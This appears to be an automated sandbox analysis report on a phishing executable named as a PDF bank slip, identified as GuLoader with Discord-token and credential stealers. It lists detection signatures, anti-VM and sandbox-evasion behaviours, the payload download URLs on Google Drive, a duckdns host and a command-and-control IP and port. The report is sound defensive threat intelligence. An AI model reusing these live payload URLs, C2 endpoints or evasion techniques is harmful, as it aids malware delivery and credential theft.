Edit tour

Windows Analysis Report
BANK SLIP_TT COPY 2-13-2024_pdf.exe

Overview

General Information

Sample name:	BANK SLIP_TT COPY 2-13-2024_pdf.exe
Analysis ID:	1615352
MD5:	7351c20933cdb70bb83cce6725f74fdc
SHA1:	83dc17dfc1058b369b27f09c560095346d7b6b6b
SHA256:	831671a9ee0a11c89793297f87ac535e049e1ea31b02a4a162bd4b103c44a667
Tags:	exeuser-abuse_ch
Infos:

Detection

Discord Token Stealer, GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Discord Token Stealer

Yara detected GuLoader

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious PE digital signature

Found many strings related to Crypto-Wallets (likely being stolen)

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses dynamic DNS services

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

BANK SLIP_TT COPY 2-13-2024_pdf.exe (PID: 6836 cmdline: "C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe" MD5: 7351C20933CDB70BB83CCE6725F74FDC)

BANK SLIP_TT COPY 2-13-2024_pdf.exe (PID: 6432 cmdline: "C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe" MD5: 7351C20933CDB70BB83CCE6725F74FDC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2794813210.00000000340E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.2768139399.0000000001BD9000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000000.00000002.2553285117.00000000032F9000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: BANK SLIP_TT COPY 2-13-2024_pdf.exe PID: 6432	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: BANK SLIP_TT COPY 2-13-2024_pdf.exe PID: 6432	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: BANK SLIP_TT COPY 2-13-2024_pdf.exe PID: 6432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BANK SLIP_TT COPY 2-13-2024_pdf.exe PID: 6432	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.340e0000.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-14T19:50:13.340609+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	51519	172.217.18.14	443	TCP

ETPRO MALWARE Win32/zgRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-14T19:50:19.337704+0100	2859902	1	Malware Command and Control Activity Detected	192.168.2.6	51534	46.161.0.101	16631	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	Virustotal: Detection: 25%			Perma Link
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	ReversingLabs: Detection: 37%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E50304 CryptUnprotectData,		6_2_36E50304
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E50DB1 CryptUnprotectData,		6_2_36E50DB1

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.6:51519 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.6:51527 version: TLS 1.2

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: protobuf-net.pdbSHA256}Lq source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405642
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_004060A4 FindFirstFileA,FindClose,	0_2_004060A4
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_0040270B FindFirstFileA,	0_2_0040270B
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_00405642 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	6_2_00405642
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_0040270B FindFirstFileA,	6_2_0040270B
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_004060A4 FindFirstFileA,FindClose,	6_2_004060A4

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2859902 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.6:51534 -> 46.161.0.101:16631

Uses dynamic DNS services

Source: unknown

DNS query: name: ghos008.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.6:51534 -> 46.161.0.101:16631

Source: global traffic	TCP traffic: 192.168.2.6:56665 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:51486 -> 162.159.36.2:53

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:51519 -> 172.217.18.14:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1pCoF543aDYa2m6SDHsiVOdiXJiDUV5pQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1pCoF543aDYa2m6SDHsiVOdiXJiDUV5pQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1pCoF543aDYa2m6SDHsiVOdiXJiDUV5pQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1pCoF543aDYa2m6SDHsiVOdiXJiDUV5pQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: ghos008.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: 82.148.8.0.in-addr.arpa

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	String found in binary or memory: http://crl.apple.com/root.crl0
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	String found in binary or memory: http://www.apple.com/appleca0
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2641038170.0000000003A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771075671.00000000039A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771075671.00000000039E0000.00000004.00000020.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771711987.0000000005600000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1pCoF543aDYa2m6SDHsiVOdiXJiDUV5pQ
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2677441911.0000000003A16000.00000004.00000020.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771075671.00000000039FE000.00000004.00000020.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2677560421.0000000003A16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771075671.00000000039E0000.00000004.00000020.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2641038170.0000000003A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1pCoF543aDYa2m6SDHsiVOdiXJiDUV5pQ&export=download
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://icanhazip.com/
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2641038170.0000000003A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A3A000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	String found in binary or memory: https://www.apple.com/appleca/0
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2641038170.0000000003A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2641038170.0000000003A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2641038170.0000000003A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2641038170.0000000003A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org#
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034396000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51527
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51519
Source: unknown	Network traffic detected: HTTP traffic on port 51527 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51519 -> 443

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.6:51519 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.6:51527 version: TLS 1.2

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Code function: 0_2_004050F7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F7

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: BANK SLIP_TT COPY 2-13-2024_pdf.exe

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403180
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_004031C0 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		6_2_004031C0

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_00404936	0_2_00404936
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_3_03910192	6_3_03910192
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_3_03910792	6_3_03910792
